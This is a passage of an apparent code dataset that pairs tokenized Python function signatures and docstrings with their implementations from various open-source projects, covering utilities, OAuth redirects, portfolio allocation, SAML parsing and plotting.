signature
stringlengths 29
44.1k
| implementation
stringlengths 0
85.2k
|
|---|---|
def get_type_name ( t ) :
"""Get a human - friendly name for the given type .
: type t : type | None
: rtype : unicode"""
|
# Lookup in the mapping
try :
return __type_names [ t ]
except KeyError : # Specific types
if issubclass ( t , six . integer_types ) :
return _ ( u'Integer number' )
# Get name from the Type itself
return six . text_type ( t . __name__ ) . capitalize ( )
|
def admin_tools_render_menu_css ( context , menu = None ) :
"""Template tag that renders the menu css files , , it takes an optional
` ` Menu ` ` instance as unique argument , if not given , the menu will be
retrieved with the ` ` get _ admin _ menu ` ` function ."""
|
if menu is None :
menu = get_admin_menu ( context )
context . update ( { 'template' : 'admin_tools/menu/css.html' , 'css_files' : menu . Media . css , } )
return context
|
def log_likelihood_of ( self , z ) :
"""log likelihood of the measurement ` z ` . This should only be called
after a call to update ( ) . Calling after predict ( ) will yield an
incorrect result ."""
|
if z is None :
return log ( sys . float_info . min )
return logpdf ( z , dot ( self . H , self . x ) , self . S )
|
def _match_serializers_by_query_arg ( self , serializers ) :
"""Match serializer by query arg ."""
|
# if the format query argument is present , match the serializer
arg_name = current_app . config . get ( 'REST_MIMETYPE_QUERY_ARG_NAME' )
if arg_name :
arg_value = request . args . get ( arg_name , None )
if arg_value is None :
return None
# Search for the serializer matching the format
try :
return serializers [ self . serializers_query_aliases [ arg_value ] ]
except KeyError : # either no serializer for this format
return None
return None
|
def strip_command ( self , command_string , output ) :
"""Strip command _ string from output string ."""
|
output_list = output . split ( command_string )
return self . RESPONSE_RETURN . join ( output_list )
|
def dropSpans ( spans , text ) :
"""Drop from text the blocks identified in : param spans : , possibly nested ."""
|
spans . sort ( )
res = ''
offset = 0
for s , e in spans :
if offset <= s : # handle nesting
if offset < s :
res += text [ offset : s ]
offset = e
res += text [ offset : ]
return res
|
def add ( self , name , value ) :
"""Adds a new entry to the table
We reduce the table size if the entry will make the
table size greater than maxsize ."""
|
# We just clear the table if the entry is too big
size = table_entry_size ( name , value )
if size > self . _maxsize :
self . dynamic_entries . clear ( )
self . _current_size = 0
# Add new entry if the table actually has a size
elif self . _maxsize > 0 :
self . dynamic_entries . appendleft ( ( name , value ) )
self . _current_size += size
self . _shrink ( )
|
def parse_commandline ( argv ) :
"""Returns the arguments parsed from * argv * as a namespace ."""
|
ap = ArgumentParser ( prog = 'wdiffhtml' , description = DESCRIPTION , epilog = EPILOG , )
ap . add_argument ( '--version' , action = 'version' , version = 'wdiffhtml v{}' . format ( version ) , help = "shows version and exits" )
ap . add_argument ( 'org_file' , metavar = 'FILENAME' , help = "original file" )
ap . add_argument ( 'new_file' , metavar = 'FILENAME' , help = "changed file" )
g_html = ap . add_argument_group ( 'Wrapper' , "Without these settings, only the `wdiff` output is returned (with INS " "and DEL tags). Here are some options to wrap the output in a HTML " "document." )
g_html . add_argument ( '-w' , '--wrap-with-html' , action = 'store_true' , help = "wrap the diff with a HTML document" )
g_html . add_argument ( '-f' , '--fold-tags' , action = 'store_true' , help = "allow INS and DEL tags to span linebraks" )
g_html . add_argument ( '-b' , '--hard-breaks' , action = 'store_true' , help = "replace line breaks with BR tags" )
g_context = ap . add_argument_group ( 'Context' , "With these options you can add additional information to the HTML " "output (means these only work alongside the `--wrap-with-html` option)." )
g_context . add_argument ( '-r' , '--revision' , metavar = 'STRING' , help = "add a revision tag or version number to the output" )
x_stamp = g_context . add_mutually_exclusive_group ( )
x_stamp . add_argument ( '-d' , '--datestamp' , action = 'store_true' , help = "add a date to the output (UTC now)" )
x_stamp . add_argument ( '-D' , '--timestamp' , action = 'store_true' , help = "add date and time to the output (UTC now)" )
g_files = ap . add_argument_group ( 'Files' , "Instead of using the default templates, you can use your own files. " "These only work alongside the `--wrap-with-html` option" )
g_files . add_argument ( '-t' , '--template' , type = FileType ( 'r' ) , metavar = 'FILE' , help = "load the Jinja2 template from this file" )
g_files . add_argument ( '-c' , '--css' , type = FileType ( 'r' ) , metavar = 'FILE' , help = "load CSS from this file" )
g_files . add_argument ( '-j' , '--js' , type = FileType ( 'r' ) , metavar = 'FILE' , help = "load Javascript from this file" )
g_files . add_argument ( '-J' , '--js2' , type = FileType ( 'r' ) , metavar = 'FILE' , help = "load another Javascript from this file (like Zepto)" )
# parse args
args = ap . parse_args ( argv )
# check for wrapper
if not args . wrap_with_html : # check context arguments and file arguments
for group in ( g_context , g_files ) :
args_to_check = [ opt . dest for opt in group . _group_actions ]
if any ( [ getattr ( args , attr ) for attr in args_to_check ] ) :
msg = "the options require that `--wrap-with-html` is used"
ap . error ( msg )
return args
|
def absdeg ( deg ) :
'''Change from signed degrees to 0-180 or 0-360 ranges
deg : ndarray
Movement data in pitch , roll , yaw ( degrees )
Returns
deg _ abs : ndarray
Movement translated from - 180:180 / - 90:90 degrees to 0:360/0:180 degrees
Example
deg = numpy . array ( [ - 170 , - 120 , 0 , 90 ] )
absdeg ( deg ) # returns array ( [ 190 , 240 , 0 , 90 ] )'''
|
import numpy
d = numpy . copy ( deg )
if numpy . max ( numpy . abs ( deg ) ) > 90.0 :
d [ deg < 0 ] = 360 + deg [ deg < 0 ]
else :
d [ deg < 0 ] = 180 + deg [ deg < 0 ]
return d
|
def getAnalysisKeywords ( self ) :
"""The analysis service keywords found"""
|
analyses = [ ]
for rows in self . getRawResults ( ) . values ( ) :
for row in rows :
analyses = list ( set ( analyses + row . keys ( ) ) )
return analyses
|
def size_on_disk ( self , start_pos = 0 ) :
"""Returns the size of this instruction and its operands when
packed . ` start _ pos ` is required for the ` tableswitch ` and
` lookupswitch ` instruction as the padding depends on alignment ."""
|
# All instructions are at least 1 byte ( the opcode itself )
size = 1
fmts = opcode_table [ self . opcode ] [ 'operands' ]
if self . wide :
size += 2
# Special case for iinc which has a 2nd extended operand .
if self . opcode == 0x84 :
size += 2
elif fmts : # A simple opcode with simple operands .
for fmt , _ in fmts :
size += fmt . value . size
elif self . opcode == 0xAB : # lookupswitch
padding = 4 - ( start_pos + 1 ) % 4
padding = padding if padding != 4 else 0
size += padding
# default & npairs
size += 8
size += len ( self . operands [ 0 ] ) * 8
elif self . opcode == 0xAA : # tableswitch
raise NotImplementedError ( )
return size
|
def suggest_pairs ( top_n = 10 , per_n = 3 , ignore_before = 300 ) :
"""Find the maximally interesting pairs of players to match up
First , sort the ratings by uncertainty .
Then , take the ten highest players with the highest uncertainty
For each of them , call them ` p1 `
Sort all the models by their distance from p1 ' s rating and take the 20
nearest rated models . ( ' candidate _ p2s ' )
Choose pairings , ( p1 , p2 ) , randomly from this list .
` top _ n ` will pair the top n models by uncertainty .
` per _ n ` will give each of the top _ n models this many opponents
` ignore _ before ` is the model number to ` filter ` off , i . e . , the early models .
Returns a list of * model numbers * , not model ids ."""
|
db = sqlite3 . connect ( "ratings.db" )
data = db . execute ( "select model_winner, model_loser from wins" ) . fetchall ( )
bucket_ids = [ id [ 0 ] for id in db . execute ( "select id from models where bucket = ?" , ( fsdb . models_dir ( ) , ) ) . fetchall ( ) ]
bucket_ids . sort ( )
data = [ d for d in data if d [ 0 ] in bucket_ids and d [ 1 ] in bucket_ids ]
ratings = [ ( model_num_for ( k ) , v [ 0 ] , v [ 1 ] ) for k , v in compute_ratings ( data ) . items ( ) ]
ratings . sort ( )
ratings = ratings [ ignore_before : ]
# Filter off the first 100 models , which improve too fast .
ratings . sort ( key = lambda r : r [ 2 ] , reverse = True )
res = [ ]
for p1 in ratings [ : top_n ] :
candidate_p2s = sorted ( ratings , key = lambda p2_tup : abs ( p1 [ 1 ] - p2_tup [ 1 ] ) ) [ 1 : 20 ]
choices = random . sample ( candidate_p2s , per_n )
print ( "Pairing {}, sigma {:.2f} (Rating {:.2f})" . format ( p1 [ 0 ] , p1 [ 2 ] , p1 [ 1 ] ) )
for p2 in choices :
res . append ( [ p1 [ 0 ] , p2 [ 0 ] ] )
print ( " {}, ratings delta {:.2f}" . format ( p2 [ 0 ] , abs ( p1 [ 1 ] - p2 [ 1 ] ) ) )
return res
|
def _parse_request ( self , enc_request , request_cls , service , binding ) :
"""Parse a Request
: param enc _ request : The request in its transport format
: param request _ cls : The type of requests I expect
: param service :
: param binding : Which binding that was used to transport the message
to this entity .
: return : A request instance"""
|
_log_info = logger . info
_log_debug = logger . debug
# The addresses I should receive messages like this on
receiver_addresses = self . config . endpoint ( service , binding , self . entity_type )
if not receiver_addresses and self . entity_type == "idp" :
for typ in [ "aa" , "aq" , "pdp" ] :
receiver_addresses = self . config . endpoint ( service , binding , typ )
if receiver_addresses :
break
_log_debug ( "receiver addresses: %s" , receiver_addresses )
_log_debug ( "Binding: %s" , binding )
try :
timeslack = self . config . accepted_time_diff
if not timeslack :
timeslack = 0
except AttributeError :
timeslack = 0
_request = request_cls ( self . sec , receiver_addresses , self . config . attribute_converters , timeslack = timeslack )
xmlstr = self . unravel ( enc_request , binding , request_cls . msgtype )
must = self . config . getattr ( "want_authn_requests_signed" , "idp" )
only_valid_cert = self . config . getattr ( "want_authn_requests_only_with_valid_cert" , "idp" )
if only_valid_cert is None :
only_valid_cert = False
if only_valid_cert :
must = True
_request = _request . loads ( xmlstr , binding , origdoc = enc_request , must = must , only_valid_cert = only_valid_cert )
_log_debug ( "Loaded request" )
if _request :
_request = _request . verify ( )
_log_debug ( "Verified request" )
if not _request :
return None
else :
return _request
|
def portfolio ( weights , latest_prices , min_allocation = 0.01 , total_portfolio_value = 10000 ) :
"""For a long only portfolio , convert the continuous weights to a discrete allocation
in a greedy iterative approach . This can be thought of as a clever way to round
the continuous weights to an integer number of shares
: param weights : continuous weights generated from the ` ` efficient _ frontier ` ` module
: type weights : dict
: param latest _ prices : the most recent price for each asset
: type latest _ prices : pd . Series or dict
: param min _ allocation : any weights less than this number are considered negligible ,
defaults to 0.01
: type min _ allocation : float , optional
: param total _ portfolio _ value : the desired total value of the portfolio , defaults to 10000
: type total _ portfolio _ value : int / float , optional
: raises TypeError : if ` ` weights ` ` is not a dict
: raises TypeError : if ` ` latest _ prices ` ` isn ' t a series
: raises ValueError : if not ` ` 0 < min _ allocation < 0.3 ` `
: return : the number of shares of each ticker that should be purchased , along with the amount
of funds leftover .
: rtype : ( dict , float )"""
|
if not isinstance ( weights , dict ) :
raise TypeError ( "weights should be a dictionary of {ticker: weight}" )
if not isinstance ( latest_prices , ( pd . Series , dict ) ) :
raise TypeError ( "latest_prices should be a pd.Series" )
if min_allocation > 0.3 :
raise ValueError ( "min_allocation should be a small float" )
if total_portfolio_value <= 0 :
raise ValueError ( "total_portfolio_value must be greater than zero" )
# Drop any companies with negligible weights . We use a tuple because order matters .
nonzero_weights = [ ( k , v ) for k , v in weights . items ( ) if v > min_allocation ]
print ( "{} out of {} tickers were removed" . format ( len ( weights ) - len ( nonzero_weights ) , len ( weights ) ) )
# Sort in descending order of weight
nonzero_weights . sort ( key = lambda x : x [ 1 ] , reverse = True )
available_funds = total_portfolio_value
shares_bought = [ ]
buy_prices = [ ]
# First round
for ticker , weight in nonzero_weights :
price = latest_prices [ ticker ]
# Attempt to buy the lower integer number of shares
n_shares = int ( weight * total_portfolio_value / price )
cost = n_shares * price
if cost > available_funds : # Buy as many as possible
n_shares = available_funds // price
if n_shares == 0 :
print ( "Insufficient funds" )
available_funds -= cost
shares_bought . append ( n_shares )
buy_prices . append ( price )
# Second round
while available_funds > 0 : # Calculate the equivalent continuous weights of the shares that
# have already been bought
current_weights = np . array ( buy_prices ) * np . array ( shares_bought )
current_weights /= current_weights . sum ( )
ideal_weights = np . array ( [ i [ 1 ] for i in nonzero_weights ] )
deficit = ideal_weights - current_weights
# Attempt to buy the asset whose current weights deviate the most
idx = np . argmax ( deficit )
ticker , weight = nonzero_weights [ idx ]
price = latest_prices [ ticker ]
# If we can ' t afford this asset , search for the next highest deficit that we
# can purchase .
counter = 0
while price > available_funds :
deficit [ idx ] = 0
# we can no longer purchase the asset at idx
idx = np . argmax ( deficit )
# find the next most deviant asset
# If either of these conditions is met , we break out of both while loops
# hence the repeated statement below
if deficit [ idx ] < 0 or counter == 10 :
break
ticker , weight = nonzero_weights [ idx ]
price = latest_prices [ ticker ]
counter += 1
if deficit [ idx ] <= 0 or counter == 10 : # See https : / / stackoverflow . com / questions / 189645/
break
# Buy one share at a time
shares_bought [ idx ] += 1
available_funds -= price
print ( "Funds remaining: {:.2f}" . format ( available_funds ) )
num_shares = dict ( zip ( [ i [ 0 ] for i in nonzero_weights ] , shares_bought ) )
return num_shares , available_funds
|
def _extract_zip ( archive , dest = None , members = None ) :
"""Extract the ZipInfo object to a real file on the path targetpath ."""
|
# Python 2.5 compatibility .
dest = dest or os . getcwd ( )
members = members or archive . infolist ( )
for member in members :
if isinstance ( member , basestring ) :
member = archive . getinfo ( member )
_extract_zip_member ( archive , member , dest )
|
def get_historical_output ( self , assessment , options ) :
"""To get output of a historical Assessment
: param assessment : string
: param options : dict"""
|
responseFormat = None
if options and 'format' in options and options [ 'format' ] is not None :
responseFormat = options [ 'format' ]
options [ 'format' ] = None
url = '/assessment/' + str ( assessment ) + '/output?' + urllib . parse . urlencode ( options )
response = self . http . downstream ( url , responseFormat )
return response
|
def make_posix ( path ) : # type : ( str ) - > str
"""Convert a path with possible windows - style separators to a posix - style path
( with * * / * * separators instead of * * \\ * * separators ) .
: param Text path : A path to convert .
: return : A converted posix - style path
: rtype : Text
> > > make _ posix ( " c : / users / user / venvs / some _ venv \\ Lib \\ site - packages " )
" c : / users / user / venvs / some _ venv / Lib / site - packages "
> > > make _ posix ( " c : \\ users \\ user \\ venvs \\ some _ venv " )
" c : / users / user / venvs / some _ venv " """
|
if not isinstance ( path , six . string_types ) :
raise TypeError ( "Expected a string for path, received {0!r}..." . format ( path ) )
starts_with_sep = path . startswith ( os . path . sep )
separated = normalize_path ( path ) . split ( os . path . sep )
if isinstance ( separated , ( list , tuple ) ) :
path = posixpath . join ( * separated )
if starts_with_sep :
path = "/{0}" . format ( path )
return path
|
def users_create_token ( self , user_id = None , username = None , ** kwargs ) :
"""Create a user authentication token ."""
|
if user_id :
return self . __call_api_post ( 'users.createToken' , userId = user_id , kwargs = kwargs )
elif username :
return self . __call_api_post ( 'users.createToken' , username = username , kwargs = kwargs )
else :
raise RocketMissingParamException ( 'userID or username required' )
|
def _get_bin ( self , key ) :
'''Returns a binned dictionary based on redis zscore
@ return : The sorted dict'''
|
# keys based on score
sortedDict = { }
# this doesnt return them in order , need to bin first
for item in self . redis_conn . zscan_iter ( key ) :
my_item = ujson . loads ( item [ 0 ] )
# score is negated in redis
my_score = - item [ 1 ]
if my_score not in sortedDict :
sortedDict [ my_score ] = [ ]
sortedDict [ my_score ] . append ( my_item )
return sortedDict
|
def check_input_files_for_variadic_seq ( headerDir , sourceDir ) :
"""Checks if files , used as input when pre - processing MPL - containers in their variadic form , need fixing ."""
|
# Check input files in include / source - directories .
files = glob . glob ( os . path . join ( headerDir , "*.hpp" ) )
files += glob . glob ( os . path . join ( headerDir , "aux_" , "*.hpp" ) )
files += glob . glob ( os . path . join ( sourceDir , "src" , "*" ) )
for currentFile in sorted ( files ) :
if check_header_comment ( currentFile ) :
return True
return False
|
def setup_legacy_graph_extended ( pants_ignore_patterns , workdir , local_store_dir , build_file_imports_behavior , options_bootstrapper , build_configuration , build_root = None , native = None , glob_match_error_behavior = None , build_ignore_patterns = None , exclude_target_regexps = None , subproject_roots = None , include_trace_on_error = True , execution_options = None , ) :
"""Construct and return the components necessary for LegacyBuildGraph construction .
: param list pants _ ignore _ patterns : A list of path ignore patterns for FileSystemProjectTree ,
usually taken from the ' - - pants - ignore ' global option .
: param str workdir : The pants workdir .
: param local _ store _ dir : The directory to use for storing the engine ' s LMDB store in .
: param build _ file _ imports _ behavior : How to behave if a BUILD file being parsed tries to use
import statements . Valid values : " allow " , " warn " , " error " .
: type build _ file _ imports _ behavior : string
: param str build _ root : A path to be used as the build root . If None , then default is used .
: param Native native : An instance of the native - engine subsystem .
: param options _ bootstrapper : A ` OptionsBootstrapper ` object containing bootstrap options .
: type options _ bootstrapper : : class : ` pants . options . options _ bootstrapper . OptionsBootstrapper `
: param build _ configuration : The ` BuildConfiguration ` object to get build file aliases from .
: type build _ configuration : : class : ` pants . build _ graph . build _ configuration . BuildConfiguration `
: param glob _ match _ error _ behavior : How to behave if a glob specified for a target ' s sources or
bundles does not expand to anything .
: type glob _ match _ error _ behavior : : class : ` pants . option . global _ options . GlobMatchErrorBehavior `
: param list build _ ignore _ patterns : A list of paths ignore patterns used when searching for BUILD
files , usually taken from the ' - - build - ignore ' global option .
: param list exclude _ target _ regexps : A list of regular expressions for excluding targets .
: param list subproject _ roots : Paths that correspond with embedded build roots
under the current build root .
: param bool include _ trace _ on _ error : If True , when an error occurs , the error message will
include the graph trace .
: param execution _ options : Option values for ( remote ) process execution .
: type execution _ options : : class : ` pants . option . global _ options . ExecutionOptions `
: returns : A LegacyGraphScheduler ."""
|
build_root = build_root or get_buildroot ( )
build_configuration = build_configuration or BuildConfigInitializer . get ( options_bootstrapper )
bootstrap_options = options_bootstrapper . bootstrap_options . for_global_scope ( )
build_file_aliases = build_configuration . registered_aliases ( )
rules = build_configuration . rules ( )
symbol_table = _legacy_symbol_table ( build_file_aliases )
project_tree = FileSystemProjectTree ( build_root , pants_ignore_patterns )
execution_options = execution_options or DEFAULT_EXECUTION_OPTIONS
# Register " literal " subjects required for these rules .
parser = LegacyPythonCallbacksParser ( symbol_table , build_file_aliases , build_file_imports_behavior )
address_mapper = AddressMapper ( parser = parser , build_ignore_patterns = build_ignore_patterns , exclude_target_regexps = exclude_target_regexps , subproject_roots = subproject_roots )
@ rule ( GlobMatchErrorBehavior , [ ] )
def glob_match_error_behavior_singleton ( ) :
return glob_match_error_behavior or GlobMatchErrorBehavior . ignore
@ rule ( BuildConfiguration , [ ] )
def build_configuration_singleton ( ) :
return build_configuration
@ rule ( SymbolTable , [ ] )
def symbol_table_singleton ( ) :
return symbol_table
# Create a Scheduler containing graph and filesystem rules , with no installed goals . The
# LegacyBuildGraph will explicitly request the products it needs .
rules = ( [ RootRule ( Console ) , glob_match_error_behavior_singleton , build_configuration_singleton , symbol_table_singleton , ] + create_legacy_graph_tasks ( ) + create_fs_rules ( ) + create_process_rules ( ) + create_graph_rules ( address_mapper ) + create_options_parsing_rules ( ) + structs_rules ( ) + # TODO : This should happen automatically , but most tests ( e . g . tests / python / pants _ test / auth ) fail if it ' s not here :
python_test_runner . rules ( ) + rules )
goal_map = EngineInitializer . _make_goal_map_from_rules ( rules )
union_rules = build_configuration . union_rules ( )
scheduler = Scheduler ( native , project_tree , workdir , local_store_dir , rules , union_rules , execution_options , include_trace_on_error = include_trace_on_error , visualize_to_dir = bootstrap_options . native_engine_visualize_to , )
return LegacyGraphScheduler ( scheduler , build_file_aliases , goal_map )
|
def get_top_frame ( self , wb_url , wb_prefix , host_prefix , env , frame_mod , replay_mod , coll = '' , extra_params = None ) :
""": param rewrite . wburl . WbUrl wb _ url : The WbUrl for the request this template is being rendered for
: param str wb _ prefix : The URL prefix pywb is serving the content using ( e . g . http : / / localhost : 8080 / live / )
: param str host _ prefix : The host URL prefix pywb is running on ( e . g . http : / / localhost : 8080)
: param dict env : The WSGI environment dictionary for the request this template is being rendered for
: param str frame _ mod : The modifier to be used for framing ( e . g . if _ )
: param str replay _ mod : The modifier to be used in the URL of the page being replayed ( e . g . mp _ )
: param str coll : The name of the collection this template is being rendered for
: param dict extra _ params : Additional parameters to be supplied to the Jninja template render method
: return : The frame insert string
: rtype : str"""
|
embed_url = wb_url . to_str ( mod = replay_mod )
if wb_url . timestamp :
timestamp = wb_url . timestamp
else :
timestamp = timestamp_now ( )
is_proxy = 'wsgiprox.proxy_host' in env
params = { 'host_prefix' : host_prefix , 'wb_prefix' : wb_prefix , 'wb_url' : wb_url , 'coll' : coll , 'options' : { 'frame_mod' : frame_mod , 'replay_mod' : replay_mod } , 'embed_url' : embed_url , 'is_proxy' : is_proxy , 'timestamp' : timestamp , 'url' : wb_url . get_url ( ) }
if extra_params :
params . update ( extra_params )
if self . banner_view :
banner_html = self . banner_view . render_to_string ( env , ** params )
params [ 'banner_html' ] = banner_html
return self . render_to_string ( env , ** params )
|
def GetCodeObjectAtLine ( module , line ) :
"""Searches for a code object at the specified line in the specified module .
Args :
module : module to explore .
line : 1 - based line number of the statement .
Returns :
( True , Code object ) on success or ( False , ( prev _ line , next _ line ) ) on
failure , where prev _ line and next _ line are the closest lines with code above
and below the specified line , or None if they do not exist ."""
|
if not hasattr ( module , '__file__' ) :
return ( False , ( None , None ) )
prev_line = 0
next_line = six . MAXSIZE
for code_object in _GetModuleCodeObjects ( module ) :
for co_line_number in _GetLineNumbers ( code_object ) :
if co_line_number == line :
return ( True , code_object )
elif co_line_number < line :
prev_line = max ( prev_line , co_line_number )
elif co_line_number > line :
next_line = min ( next_line , co_line_number )
break
prev_line = None if prev_line == 0 else prev_line
next_line = None if next_line == six . MAXSIZE else next_line
return ( False , ( prev_line , next_line ) )
|
def get_scissors_builder ( self ) :
"""Returns an instance of : class : ` ScissorsBuilder ` from the SIGRES file .
Raise :
` RuntimeError ` if SIGRES file is not found ."""
|
from abipy . electrons . scissors import ScissorsBuilder
if self . sigres_path :
return ScissorsBuilder . from_file ( self . sigres_path )
else :
raise RuntimeError ( "Cannot find SIGRES file!" )
|
async def system_bus_async ( loop = None , ** kwargs ) :
"returns a Connection object for the D - Bus system bus ."
|
return Connection ( await dbus . Connection . bus_get_async ( DBUS . BUS_SYSTEM , private = False , loop = loop ) ) . register_additional_standard ( ** kwargs )
|
def digits ( number , base = 10 ) :
"""Determines the number of digits of a number in a specific base .
Args :
number ( int ) : An integer number represented in base 10.
base ( int ) : The base to find the number of digits .
Returns :
Number of digits when represented in a particular base ( integer ) .
Examples :
> > > digits ( 255)
> > > digits ( 255 , 16)
> > > digits ( 256 , 16)
> > > digits ( 256 , 2)
> > > digits ( 0 , 678363)
> > > digits ( - 1 , 678363)
> > > digits ( 12345 , 10)"""
|
if number < 1 :
return 0
digits = 0
n = 1
while ( number >= 1 ) :
number //= base
digits += 1
return digits
|
def sections ( self ) :
"""Returns a list of all media sections in this library . Library sections may be any of
: class : ` ~ plexapi . library . MovieSection ` , : class : ` ~ plexapi . library . ShowSection ` ,
: class : ` ~ plexapi . library . MusicSection ` , : class : ` ~ plexapi . library . PhotoSection ` ."""
|
key = '/library/sections'
sections = [ ]
for elem in self . _server . query ( key ) :
for cls in ( MovieSection , ShowSection , MusicSection , PhotoSection ) :
if elem . attrib . get ( 'type' ) == cls . TYPE :
section = cls ( self . _server , elem , key )
self . _sectionsByID [ section . key ] = section
sections . append ( section )
return sections
|
def create_training_job ( self , TrainingJobName , AlgorithmSpecification , OutputDataConfig , ResourceConfig , InputDataConfig = None , ** kwargs ) :
"""Create a training job in Local Mode
Args :
TrainingJobName ( str ) : local training job name .
AlgorithmSpecification ( dict ) : Identifies the training algorithm to use .
InputDataConfig ( dict ) : Describes the training dataset and the location where it is stored .
OutputDataConfig ( dict ) : Identifies the location where you want to save the results of model training .
ResourceConfig ( dict ) : Identifies the resources to use for local model traininig .
HyperParameters ( dict ) [ optional ] : Specifies these algorithm - specific parameters to influence the quality of
the final model ."""
|
InputDataConfig = InputDataConfig or { }
container = _SageMakerContainer ( ResourceConfig [ 'InstanceType' ] , ResourceConfig [ 'InstanceCount' ] , AlgorithmSpecification [ 'TrainingImage' ] , self . sagemaker_session )
training_job = _LocalTrainingJob ( container )
hyperparameters = kwargs [ 'HyperParameters' ] if 'HyperParameters' in kwargs else { }
training_job . start ( InputDataConfig , OutputDataConfig , hyperparameters , TrainingJobName )
LocalSagemakerClient . _training_jobs [ TrainingJobName ] = training_job
|
def authorize ( self , scope = None , redirect_uri = None , state = None ) :
"""Redirect to GitHub and request access to a user ' s data .
: param scope : List of ` Scopes ` _ for which to request access , formatted
as a string or comma delimited list of scopes as a
string . Defaults to ` ` None ` ` , resulting in granting
read - only access to public information ( includes public
user profile info , public repository info , and gists ) .
For more information on this , see the examples in
presented in the GitHub API ` Scopes ` _ documentation , or
see the examples provided below .
: type scope : str
: param redirect _ uri : ` Redirect URL ` _ to which to redirect the user
after authentication . Defaults to ` ` None ` ` ,
resulting in using the default redirect URL for
the OAuth application as defined in GitHub . This
URL can differ from the callback URL defined in
your GitHub application , however it must be a
subdirectory of the specified callback URL ,
otherwise raises a : class : ` GitHubError ` . For more
information on this , see the examples in presented
in the GitHub API ` Redirect URL ` _ documentation ,
or see the example provided below .
: type redirect _ uri : str
: param state : An unguessable random string . It is used to protect
against cross - site request forgery attacks .
: type state : str
For example , if we wanted to use this method to get read / write access
to user profile information , in addition to read - write access to code ,
commit status , etc . , we would need to use the ` Scopes ` _ ` ` user ` ` and
` ` repo ` ` when calling this method .
. . code - block : : python
github . authorize ( scope = " user , repo " )
Additionally , if we wanted to specify a different redirect URL
following authorization .
. . code - block : : python
# Our application ' s callback URL is " http : / / example . com / callback "
redirect _ uri = " http : / / example . com / callback / my / path "
github . authorize ( scope = " user , repo " , redirect _ uri = redirect _ uri )
. . _ Scopes : https : / / developer . github . com / v3 / oauth / # scopes
. . _ Redirect URL : https : / / developer . github . com / v3 / oauth / # redirect - urls"""
|
_logger . debug ( "Called authorize()" )
params = { 'client_id' : self . client_id }
if scope :
params [ 'scope' ] = scope
if redirect_uri :
params [ 'redirect_uri' ] = redirect_uri
if state :
params [ 'state' ] = state
url = self . auth_url + 'authorize?' + urlencode ( params )
_logger . debug ( "Redirecting to %s" , url )
return redirect ( url )
|
def _chunk_query ( l , n , cn , conn , table , db_type ) :
"""Call for inserting SQL query in chunks based on n rows
Args :
l ( list ) : List of tuples
n ( int ) : Number of rows
cn ( str ) : Column names
conn ( connection object ) : Database connection object
table ( str ) : Table name
db _ type ( str ) : If " sqlite " or " mysql " """
|
# For item i in a range that is a length of l ,
[ insert_query_m ( l [ i : i + n ] , table , conn , cn , db_type ) for i in range ( 0 , len ( l ) , n ) ]
|
def generic_add ( a , b ) :
print
"""Simple function to add two numbers"""
|
logger . info ( 'Called generic_add({}, {})' . format ( a , b ) )
return a + b
|
def xml_request ( check_object = False , check_invalid_data_mover = False ) :
"""indicate the return value is a xml api request
: param check _ invalid _ data _ mover :
: param check _ object :
: return : the response of this request"""
|
def decorator ( f ) :
@ functools . wraps ( f )
def func_wrapper ( self , * argv , ** kwargs ) :
request = f ( self , * argv , ** kwargs )
return self . request ( request , check_object = check_object , check_invalid_data_mover = check_invalid_data_mover )
return func_wrapper
return decorator
|
def valid_project ( self ) :
"""Handle an invalid active project ."""
|
try :
path = self . projects . get_active_project_path ( )
except AttributeError :
return
if bool ( path ) :
if not self . projects . is_valid_project ( path ) :
if path :
QMessageBox . critical ( self , _ ( 'Error' ) , _ ( "<b>{}</b> is no longer a valid Spyder project! " "Since it is the current active project, it will " "be closed automatically." ) . format ( path ) )
self . projects . close_project ( )
|
async def set_default_min_hwe_kernel ( cls , version : typing . Optional [ str ] ) :
"""See ` get _ default _ min _ hwe _ kernel ` ."""
|
await cls . set_config ( "default_min_hwe_kernel" , "" if version is None else version )
|
def _highlight_lines ( self , tokensource ) :
"""Highlighted the lines specified in the ` hl _ lines ` option by
post - processing the token stream coming from ` _ format _ lines ` ."""
|
hls = self . hl_lines
for i , ( t , value ) in enumerate ( tokensource ) :
if t != 1 :
yield t , value
if i + 1 in hls : # i + 1 because Python indexes start at 0
if self . noclasses :
style = ''
if self . style . highlight_color is not None :
style = ( ' style="background-color: %s"' % ( self . style . highlight_color , ) )
yield 1 , '<span%s>%s</span>' % ( style , value )
else :
yield 1 , '<span class="hll">%s</span>' % value
else :
yield 1 , value
|
def matrix ( df , filter = None , n = 0 , p = 0 , sort = None , figsize = ( 25 , 10 ) , width_ratios = ( 15 , 1 ) , color = ( 0.25 , 0.25 , 0.25 ) , fontsize = 16 , labels = None , sparkline = True , inline = False , freq = None ) :
"""A matrix visualization of the nullity of the given DataFrame .
For optimal performance , please stay within 250 rows and 50 columns .
: param df : The ` DataFrame ` being mapped .
: param filter : The filter to apply to the heatmap . Should be one of " top " , " bottom " , or None ( default ) .
: param n : The max number of columns to include in the filtered DataFrame .
: param p : The max percentage fill of the columns in the filtered DataFrame .
: param sort : The sort to apply to the heatmap . Should be one of " ascending " , " descending " , or None ( default ) .
: param figsize : The size of the figure to display .
: param fontsize : The figure ' s font size . Default to 16.
: param labels : Whether or not to display the column names . Defaults to the underlying data labels when there are
50 columns or less , and no labels when there are more than 50 columns .
: param sparkline : Whether or not to display the sparkline . Defaults to True .
: param width _ ratios : The ratio of the width of the matrix to the width of the sparkline . Defaults to ` ( 15 , 1 ) ` .
Does nothing if ` sparkline = False ` .
: param color : The color of the filled columns . Default is ` ( 0.25 , 0.25 , 0.25 ) ` .
: return : If ` inline ` is False , the underlying ` matplotlib . figure ` object . Else , nothing ."""
|
df = nullity_filter ( df , filter = filter , n = n , p = p )
df = nullity_sort ( df , sort = sort )
height = df . shape [ 0 ]
width = df . shape [ 1 ]
# z is the color - mask array , g is a NxNx3 matrix . Apply the z color - mask to set the RGB of each pixel .
z = df . notnull ( ) . values
g = np . zeros ( ( height , width , 3 ) )
g [ z < 0.5 ] = [ 1 , 1 , 1 ]
g [ z > 0.5 ] = color
# Set up the matplotlib grid layout . A unary subplot if no sparkline , a left - right splot if yes sparkline .
plt . figure ( figsize = figsize )
if sparkline :
gs = gridspec . GridSpec ( 1 , 2 , width_ratios = width_ratios )
gs . update ( wspace = 0.08 )
ax1 = plt . subplot ( gs [ 1 ] )
else :
gs = gridspec . GridSpec ( 1 , 1 )
ax0 = plt . subplot ( gs [ 0 ] )
# Create the nullity plot .
ax0 . imshow ( g , interpolation = 'none' )
# Remove extraneous default visual elements .
ax0 . set_aspect ( 'auto' )
ax0 . grid ( b = False )
